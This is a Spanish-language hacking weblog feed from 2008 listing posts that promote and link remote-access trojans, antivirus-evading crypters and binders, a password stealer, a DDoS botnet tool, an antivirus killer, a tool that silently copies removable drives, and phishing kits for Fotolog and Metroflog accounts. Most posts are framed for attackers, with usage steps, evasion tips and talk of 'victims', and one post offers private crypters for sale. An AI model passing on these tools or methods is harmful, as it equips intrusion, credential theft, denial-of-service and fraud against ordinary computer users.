TROYANOS Y VIRUSTROYANOS Y VIRUSTroyanosyvirus es un weblog dedicado a todo lo que tenga que ver con acceso remoto, virus informaticos y seguridad. Articles
RCBF V1.3.3 2008
2008-03-06 16:09:00 Hace unos dias salio la version 1.3.3 de un troyano llamado RCBF, es muy parecido al bifrost en su aspecto y en caracteristicas, pero este es indetectable por ahora y tiene nuevos metodos de salteo de firewall y ocultacion.La creacion del server se realiza fuera del cliente con un builder que viene incluido en la descarga, al parecer no funciona en pcs remotas que ya tengan un server del bifrost instalado, a menos que se le de la opcion "update" desde el bifrost si ya se tiene como victima.Al crear el server este ya viene incluido con el keylogger y el pack de extencion, a diferencia de el bifrost que da la opcion de elejirlo o no.Imagenes:Cuando analize el builder y el cliente me di cuenta que escanea unas ips (60.216.0.0/16 y 199.176.0.0/16) en el puerto 445, no se para que realiza eso, les aviso antes para que no digan que posteo cosas con "regalitos" eso viene de parte del autor y no se para que servira.Les dejo los analisis de anubisAnalisis del ClienteAnalisis del BuilderDesca... More About: 2008
Lanzador fotolog.com y metroflog.com
2008-03-03 05:16:00 A pedido del publico ya estan disponibles los lanzadores de fotolog.com y metroflog.com!!!LANZADOR FOTOLOG.COMLANZADOR METROFLOG.COMSu uso es extremadamente simple, solo deben poner la direccion del flog y el correo de la victima y luego poner enviar.Una vez que ponen enviar se le envia un mail entre los 5 y 10 minutos a la victima diciendole que debe confirmar su cuenta porque alguien a intentado entrar...Entonces la victima hara click en el enlace que da y lo lleva a una pagina donde debe ingresar su id y password.Al ingresar sus datos se loguea automaticamente en la pagina oficial para evitar sospechas indeseadas.Para ver la contraseña de tus victima simplemente te vas a la direccion del lanzador fotolog o metroflog y en buscar victimas pones su flog y te saldra la contraseña.Les dejo de vuelta los lanzadores:LANZADOR FOTOLOG.COMLANZADOR METROFLOG.COMGracias a HEBER de lagoenelcielo.com.ar por el codigo fuente. More About: Fotolog
NetBot Attacker 1.4
2008-03-01 01:12:00 NetBot Attacker es una herramienta capaz de tirar servidores realizando ataques DDOS de distintos tipos con todos tus bot.Obiamente la potencia de este ataque dependera principalemte de la cantidad de bots que tengas.Lo bueno de esta botnet es que tiene un aspecto "visible" en comparacion de las otras que trabajan con servidores irc. Tambien incluye unas opciones colectivas, para descargar y ejecutar archivos, abrir determinada pagina web, apagar todas las pcs, etc.Para configurar el servidor primero debemos ir hacia el icono del IE en la parte superior izquierda y configurar todo con nuestros datos de conexion ftp, nuestra ip y puertos.Un ejemplo utilizando miarroba.comFtp server ip: 89.17.220.55 (esa es la ip del ftp miarroba.com)Local ip: troyanosyvirus.no-ip.org (mi ip)Path file upload: /ip.jpg (dejenlo como esta)Ftp user: troyanosyvirus (si mi web es troyanosyvirus.miarroba.com) port: 21Ftp pass: 123456 (mi password para ingresar) port: 80Listo ahora le damos update (el primer ...
Tutorial: Haz indetectable cualquier troyano by octalh
2008-02-26 17:02:00 En este tutorial de 23 paginas se enseña uno de los metodos mas efectivos para burlar los antivirus, se trata de la modificacion de sus firmas maliciosas.Este metodo requiere algo de paciencia pero vale la pena por sus resultados.El manual esta muy completo, bien explicado y con muchas imagenes, tambien esta disponible la descarga de las herramientas que se utilizan.DescargasManual (megaupload)Herramientas (megaupload)PASS: http://www.octalh.mx.gsManual (rapidshare)Herramientas (rapidshare)PASS: http://octalh.33host.com More About: Tutorial
AV-Firewall killer
2008-02-23 18:43:00 Uno de los usarios del blog me envio un firewall killer que descargo del ares para que lo probara, sin querer lo abri en mi otra pc y me mato TODO lo que tenga que ver con seguridad, pero cuando digo todo es todo, explicitamente me desactivo el Nod32, el Kaspersky, el Norton, el Ad-Aware, el ccleaner, el System Mechanic, los firewall y mas, me baje varios programas para ver si me lo desactivaba y nada, lo encontraba al virus pero no lo podia borrar, lo intente borrar manualmente y tampoco pasaba nada..Cuando quiero entrar a algun antivirus aparece un cartel como este:Y los anti spyware funcionan mal, no escanean correctamente...El archivo es detectado y pesa 714 kb, pero sirve para juntarlo con un server con algun binder como el rude surprise que es indetectable, o para cuando tienen una victima sin antivirus y la quieren conservar, sera muy dificil que se desinfecte.Proximamente le hare algunas mejoras a este killer:-Sera Indetectable-Las victimas no podran ingresar a ninguna pagin... More About: Firewall , Killer
Turkojan 4
2008-02-20 16:27:00 Ayer salio la version 4 del troyano turco, troyano que se caracteriza por su gran cantidad de herramientas y sus funciones FUN.Por ahora es indetectable y tiene la opcion de cambiarle el lenguaje a español y a otros idiomas mas.Lo nuevo:Remote Desktop feature added.You can view remote screen and control it via your keyboard and mouse.Now you can record video from remote webcam.Audio streaming feature added.Now you don't need to download images from remote computer,you can view them with thumbnail manager.You can get MSN logs with MSN Sniffer.You can block harmful web-pages on remote computer.You can manage remote computer with ms-dos commands.(Remote Shell)New functions added for server secrecy-Now it is harder to delete server-Server can't be show in registry,searching files,msconfig,etc.-Server can't be shown in ctrl+alt+del menu[Vista/Xp/95/98/ME].-Server prevents system restoring.It deletes all system restore points.Server size is %60 smaller now.Connection bug fixedNow ser...
Plugin para PI: Optix Screen Capture 2.0
2008-02-18 16:53:00 El poison ivy es uno de los mejores troyanos que existen, pero hay que admitir que su captura de pantalla es pesima.Por suerte th3 s13az3 creo un plugin en delphi que mejora notablemente la captura. Permite elegir la calidad de la imagen y ajustar el tamaño de la ventana a nuesrta preferencia.Como usar los plugins en el poison ivyPara usarlo simplemente tenemos que descargar el plugin y descomprimirlo en la carpeta "Plugin s" de nuestro poison ivy.Despues abrimos nuestro poison y en menu file seleccionamos manage file, ponemos load si no aparece nada y seleccionamos Optix_Screen CapC.dll que esta justamente en la carpeta plugins.Ya tenemos nuestro plugin instalado, ahora hacemos doble clic sobre una victima, nos vamos al menu plugins y hacemos click en O.P screen capture parasubir el plugin (como se ve en la primera imagen de abajo), una vez subido el plugin en la pc victima nos aparecera Optix Screen Capture para poder ver su pantalla.Recomiendo que vallan probando las distintas cal...
Cryptic v2.2 y v2.3 privados INDETECTABLES
2008-02-16 16:00:00 Hola e tenido unos problemas con el creador de estos encriptadores, asi que me canse y pongo a la venta sus encriptadores privados a menor precio.Los dos son totalmente indetectables.La version 2.2 tiene un costo de 30 US, y la version 2.3 con la posibilidad de cambiar el icono final cuesta 40US, las dos son totalmente indetectables, el creador las vende a 70 euros cada una.Estos encriptadores son privados y son menos de 10 personas las que lo tienen y segun ellos nadie lo subio a virustatal, por lo que duraran bastante tiempo.Imagenes:Cryptic 2.2:Cryptic 2.3:CANCELADAS LAS VENTASPara consultas, arreglos o demas vallan hacia la pagina de CONTACTO y me agregan al msn o me envian un mail.
Universal 1337 - The account stealer
2008-02-15 03:59:00 Universal 1337 es un capturador de contraseñas de todo tipo, puede enviar los datos a un servidor ftp o a una cuenta de mail.El server es bastante detectado y pesado (1.6Mb), pero incluye opciones para eliminar firewall y antivirus, tambien incluye un downloader.Y se lo puede encriptar facilmente sin romper el server con cualquier encriptador.Tambien permite cambiar el icono del server, mostrar mensaje al ejecutarse, cambiar la extension del server etc.Recomiendo crearse una cuenta ftp o de email exclusiva para este programa.Imagenes:Algunos de los password que captura:SteamProdukt KeysNetwork PassesPaypalEbayAIMICQMirandaTrillianMSN MessengerAOL Instant MessengerWindows Messenger (In Windows XP und Vista)Windows Live Messenger (In Windows XP und Vista)Yahoo MessengerGoogle TalkGAIM (Pidgin)Windows MailOutlook ExpressMicrosoft OutlookIncrediMailEudoraNetscapeMozilla FirefoxInternet ExplorerGroup Mail FreePC InfosDescarga:Universal 1337 V2 More About: Universal , Account
El Pharming y sus consecuencias
2008-02-12 03:25:00 El Pharming es una nueva modalidad de fraude online, que consiste básicamente enmodificar la relación que existe entre el nombre de una web en internet y su respectivo servidor Web. Se trata de suplantar el sistema de resolución de nombres de dominio (DNS) para conducir al usuario a una página web falsa idéntica a la original.Para que se entienda mejor: en situaciones normales, si tipeamos en nuestro InternetExplorer la dirección www.bancorio.com.ar, estaremos ingresando al sitio web delBanco Río de Buenos Aires. Pero si hemos sido víctimas de un ataque de Pharming, altipear www.bancorio.com.ar ingresaremos sin saberlo a un sitio web falso exactamenteigual al del banco, pero que ha sido creado por los atacantes con el fin de robar los datos de nuestra cuenta bancaria.Imagen con un ejemplo del pharming y gmail, utilizado para robar cuentas de gmail.En este manual se explica todo desde 0 como si no se supiera nada, todo con imagenes. Esta muy completo, hasta incluye algo de co...
TeamViewer v3.5
2008-02-08 21:04:00 Team viewer es una herramienta de control remoto muuuy facil de utilizar, no nesecita tener conocimientos de ip, abrir puertos, nada. Simplemente tienen que abrir el programa en las 2 pc, una sera el cliente (la que controlara la otra pc) y la otra el servidor (la que sera controlada), en la pc cliente deben poner el id y el pass de la computadora servidor, que le sale cuando ejecuta el programa, ponen conectar y listo ya podran ver el escritorio de la otra pc.Publico este programa porque parece que a varios no lo funcionaba el radmin y el vnc, este programita es totalmente seguro, por lo tanto indetectable, pesa muy poco y es mas rapido que los otros, ademas yo lo utilizo jaja.Imagenes:Descarga:TeamViewer full v3.5.3922 EspañolPagina oficial:http://www.teamviewer.com/es
Bifrost 1.2.1 Unpacked
2008-02-05 05:22:00 Esta version del bifrost 1.2.1 viene desempaquetada, lo que permite que lo modifiquemos a nuestro gusto con el reshacker u otro programa. Por ejemplo le podemos cambiar todos los textos, traducir a otro idioma, se pueden modificar los botones, los menus, las imagenes, los cursores, etc. Y lo mejor de todo es que permite modificar el stub para que el el bifrost genere servidores indetectables, esto ya es algo mas complicado pero posible, despues pondre algun manual. Otra utilidad que tiene es que se puede encriptar el cliente para que nuestro antivirus no le detecte, yo lo uso de esa manera y funciona de maravilla con nod32 y AVG. Y son muchas mas las utilidades que se le puede dar a esta version, solo es cuestion de un poquito de imaginacion.Les dejo algunas imagenes que tome recienDescargas:Bifrost 1.2.1 unpackedReshacker 3.3.4.75 en españolVideo sobre el tema por polifemo
Small Joiner by E0N
2008-02-02 03:48:00 ¿Qué es Small Joiner ?Pues como su nombre indica Small Joiner es un Joiner de tamaño muy pequeño. Para ser exactos su stub, al estar programado en asm, solo ocupa 6kb.Para q sirve eso?? Pues sirve para que se altere lo menos posible el tamaño del archivo generado por el joiner siendo mucho menos "cantoso" para la "victima".Ademas es mucho mas rapido que cualkier otro stub programado en C, Delphi o VBNotareis que el peso a subido ligeramente respecto a la anterior versión, esto a sido necesario para poder activar la opción de camio de iconoCaracteristicas de la versión final:-Junta infinitos archivos-Se puede elegir ejecutar un archivo o no-Se ha añadido un metodo de encriptación para eludir los antivirus. Atención, una vez se hayan separado los archivos los antivirus los detectarán, pero esta opción os puede ser util para añadir como primer archivo un av killer-Interfaz mejorada respecto a la anterior versión-Ahora se puede elegir el icno del archivo final. Solo hay qu...
LogicalMines v1.0
2008-01-31 00:25:00 LogicalMines es una bomba lógica que te permite, al producirse uno o varios eventos ejecutar una o varias acciones de la lista siguiente:Eventos:-Al existir o al no existir cierto archivo-Al estar corriendo o no estar corriendo cierto proceso-Después de/durante cierto tiempo con el pc corriendo-En cierta fecha/hora/dia de la semana-Al teclear cierto texto-Al existir una ventana con cierto título y estado(min,max...)-Al conectarse a cierta ip y/o puerto-Al cabo/hasta X reiniciosAcciones:-Ejecutar/abrir archivo o url-Eliminar archivo o carpeta-Eliminar proceso-Apagar/reiniciar el equipo-Subir/bajar archivo-Bajar archivo de urlImagenes:Algunas cosas útiles que se pueden hacer con el LogicalMines:-Que un proceso no se pueda lanzar.Creamos una mina de proceso especificando: taskmgr.exeCreamos un detonador de procesos especificando: taskmgr.exe-Que siempre exista cierto archivo en ejecución en nuestro pc.Subimos el archivo a un ftp y creamos una mina de Urldownload hacia nuestro arch...
Serv-U "modificado" inmune a los antivirus
2008-01-28 22:17:00 En este manual sacado de LOS CUADERNOS DE HACKXCRACK, se explica como convertir el inofensivo servidor ftp Serv-U 2.5 en un pequeño troyano totalmente indetectable e inmune a los antivirus.El texto esta completo, todo desde 0, y esta escrito para personas que recien se inician en el tema de los troyanos.Descarga:Crea tu primer troyano - indetectable e inmune a los antivirus(mirror rapidshare) More About: Antivirus
Turbinas By Volks 1.0
2008-01-26 04:03:00 Turbinas by volks es un programa algo viejito (2006) utilizado para tirar servidores. Con este programita pude tirar servers de varios juegos online, como mu online, counter strike 1.6, ragnrok, algunas webs pequeñas, etc (todo a modo de prueba,)..Se preguntaran que tipo de servidores pueden tirar, bueno pensando un poco se daran cuenta que depende de la conexion de internet del atacante y de la victima, de que tipo de server se trate, de las protecciones, etc. No vallan a querer intentar tirar google, ni servidores grandes, que no le haran ni cosquillas.Imagen de turbinasComo funciona?Forma Técnica:“Es un programa que conecta y desconecta sockets, en un milisegundo conecta y desconecta, osea que 1000 milisegundos = 1 segundo multiplicado por 5, genera 5.000 conexiones por segundo al servidor , lo cual hace que el mismo colapse.”Forma no técnica:“Suponga que hay una puerta grande (10MB de host de un servidor), y que 5.000 personas quieren entrar y salir en un segundo, enton...
Video: Botnets y Maquinas Zombies by Root3d
2008-01-24 04:33:00 Root3d creo un video muy bueno sobre botnets y maquinas zombies, no explica todo el proceso de creacion, pero se ve claramente el proceso de control, o sea como controla todas estas maquinas zombies mediante un servidor de irc.Tal vez para muchos que no saben del tema viendo este video se daran cuenta del poder que tienen con una botnet de unos cientos de maquinas zombies; puden realizar ataques ddos, realizar spam masivo, descargar, subir y ejecutar archivos en todas las pc, y muchisimo mas, todo de forma masiva, a diferencia de los troyanos.Y si pueden realizar estas actividades pueden ganar una gran cantidad de dinero con una botnet grande.El video pesa aproximadamente 75Mb, y dura unos 40 minutos, extension .avi. Todo el proceso esta claramente detallado por el autor.Dejo algunas imagenes del video:En esta imagen se ve la lista de todos los comandos del rxbot, proximamente la subire y la posteare.En esta imagen se ve como puede ver descargar, subir y ejecutar archivos a una pc z... More About: Video , Zombies , Botnets
Bifrost 1.2b + rude surprise = INDETECTABLE
2008-01-22 03:35:00 Recien haciendo unas pruebas descubri que si al server de bifrost 1.2b lo juntamos con el rude surprise 1.1.1, queda 99% indetectable y funcional, solo lo detecta el AVG con la ultima actualizacion.Lo que tenemos que hacer es simplemente agregar nuestro server de bifrost, sin ningun otro archivo al rude surprise, clickeamos en build, y ya tenemos nuestro server indetectable.Asi les debe quedar:Informacion exclusiva de troyanosyvirus.com.ar More About: Rude
Fast File Crypt 1.6
2008-01-21 04:53:00 Hoy les traigo este encriptador, esta bastante bueno, por su simplicidad y rapidez, no es la gran cosa pero sirve, ya que no sirve themida jaja. Lo probe con el poison ivy 2.3.1, Al server sin encriptar lo detectan 14/32 antivirus, encriptandolo con el fast file crypt lo detectan 6/32, de los cuales son conocidos el panda y el AVG, no lo detectan el karspersky, el nod32, norton, mcaffe, microsoft etc. Habra que ver si funciona bien con bifrost y el shark. Descarguen y pruebenlo juntando con otras aplicaciones, troyanos, etc.Descarga:Fast File Crypt 1.6 (Pagina oficial)Fast File Crypt 1.6 (Mirror subido por mi)Pagina oficial: http://juzahome.free-web-hosting.biz
Troyano shark 3
2008-01-19 19:19:00 Ya salio el troyano shark 3, exactamente compilado el 17-1-2008 en VB, troyanosyvirus.com.ar es el primero en presentarlo.Este troyano tal vez sea el sucesor del bifrost y del poison ivy debido a su gran estabilidad, velocidad, ocultacion, calidad y cantidad de herramientas, ademas de muchas caracteristicas innovadoras no incluidas en ningun troyano. A continuacion les dejo muchas de las caracteristicas escritas por mi, supongo que debe tener errores pero es lo que ay.Caracteristicas no oficiales por troyanosyvirus.com.ar:-mRC4 Encriptacion de trafico-zLib Compresion de Trafico-Instalacion por defecto, incluye 7 opciones-Pasword de conexion-Permite seleccionar el intervalo de tiempo para la conexion del server-keylogger, con caracteristica highlight, permite seleccionar maximo de tamaño del log, permite buscar.-Testear los host-Nombres de instalacion y extensiones aleatorias-HKML startup-Reg-HKU startup-Eventos al ejecutar el server, (ejecutar archivo o abrir pagina web)-Incluye un... More About: Shark
Rude surprise 1.1.1 binder
2008-01-18 05:58:00 Rude surprise tiene caracteristicas, que no tienen otros binders, como por ejemplo la de poder cambiar el stub, o borrarlo al stub despues de la ejecucion.Permite cargar y guardar la lista de programas a juntar, herramienta muy util para cuando se utilizan varios archivos, asi no hay que juntar uno por uno.Tambien permite seleccionar la carpeta donde se quiere que se extraiga cada archivo a juntar, obiamente el modo de ejecucion, etcHace unas semanas era indetectable ahora no se, tal vez lo detecten alguns avDescarga: Rude sorprise 1.1.1 binderPagina oficial: boredcoders.com More About: Rude
Trojan Remover 6.6.5 + medicina
2008-01-16 21:35:00 Esta aplicación ha sido diseñada como herramienta de ayuda, para aquellos casos en los que tu antivirus habitual no es capaz de detectar o no puede eliminar algún troyano que se haya colado en tu sistema.Trojan Remover puede acabar con estas maliciosas criaturas en cualquier archivo que haya sido infectado, incluyendo los ficheros de sistema y el Registro de Windows, y deshaciendo cualquier posible modificación que el troyano haya podido realizar en tu PC.Cada vez que encuentre un elemento sospechoso, Trojan Remover mostrará una ventana de aviso y te ofrecerá las opciones de eliminar la referencia al programa desde los ficheros de sistema y renombrar el archivo.El programa genera un archivo log con todas las actividades que realiza.Cambios recientes en Trojan Remover:-Nueva rutina de deteccion para archivos con Adware.NaviPromo.-Nuevo sistema de borrado para los archivos escondidos en el registro y sistema,con opcion de reinicio del PC si el troyano se resistea ser eliminado d... More About: Medicina
Robar datos de los discos extraíbles
2008-01-15 01:20:00 Esta aplicacion creada por Angel Sanchez, sirve para robar toda la informacion que se encuentre en un disco extraible, puede ser utilizado en ciberCafes universidades, etc.Cuando se inserta un disco extraíble (pendrive, mp3, mp4, camaras, etc.) todos los datos serán copiados de forma silenciosa a una carpeta oculta.Este programa puede ser muy util para algunas personas, ademas no es reconocido como una herramienta de hacking, asi que es totalmente indetectable por los antivirus.Como se usa:Primero se debe copiar o descoprimir toda esta carpeta en un lugar oculto donde ningún usuario la vea.Después se ejecuta el programa instalar.Una ves instalado no se debe cambiar el nombre a esta carpeta y mucho menos moverla a otro sitio.La próxima ves que se inserte un disco extraíble todos los datos serán copiados de forma silenciosa en esta misma carpeta.Solo funciona con el usuario actual de windows.Para desinstalar el programa, ejecuten el desinstalador y listo (los archivos copiados ... More About: Discos
Poison ivy 2.3.1
2008-01-11 22:52:00 El 2008-01-07 salió la nueva versión del famoso troyano Poison ivy, version 2.3.1, es un poco mas indetectable que el 2.3.0, pero no creo que dure mucho tiempo por ser un troyano tan conocido, pero mejoraron bastantes bugs y agregaron algunas cositas. como principales cambios con respecto a la versión 2.3.0 tenemos:->Device Manager, desde donde podemos administrar remotamente los dispositivos instalados, siendo posible Habilitar, Deshabilitar y Remover de manera segura algún dispositivo como teclado, mouse, impresora, CDROM, USB, etc.->Ahora en cada conexión podemos tener una imagen en miniatura del escritorio de cada PC, la cual se va actualizando cada cierto tiempo, o cada vez que nosotros queramos, pudiendo modificar el tamaño de esta imagen.->Se ha agregado la opción de crear una entrada de inicio en el registro dentro de HKLM/run.->Ahora las carpetas seleccionadas, tanto en el file manager como en el registro, serán resaltadas de color rojo->Podemos elegir si queremos o...
Ocultacion de un troyano
2008-01-09 04:09:00 Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutableAunque no sea muy habitual, es posible hacer pasar un troyano ( virus, o cualquier otro ejecutable) por un archivo de texto (.txt), de audio (.wav), una carpeta, o cualquier otro tipo de archivo (si, cualquiera).Estos archivos son en realidad troyanos, y como puedes ver parecen archivos inofensivos.Vamos a ver como se consigue hacer pasar un ejecutable por cualquier otro archivo en apariencia inofensivo.La técnica consiste en "contaminar" el sistema, de manera que una vez infectado, sea vulnerable a este método y sea él mismo el que haga parecer a los archivos maliciosos, archivos totalmente inofensivos.Increíblemente se trata de un método facilísimo.Vamos a explicar paso a paso como se hace, para poder así saber como tenemos que protegernos de este posible ataque.Leer manual completo:Manual: Ocultacion de un troyano |
|
 |
|
 |
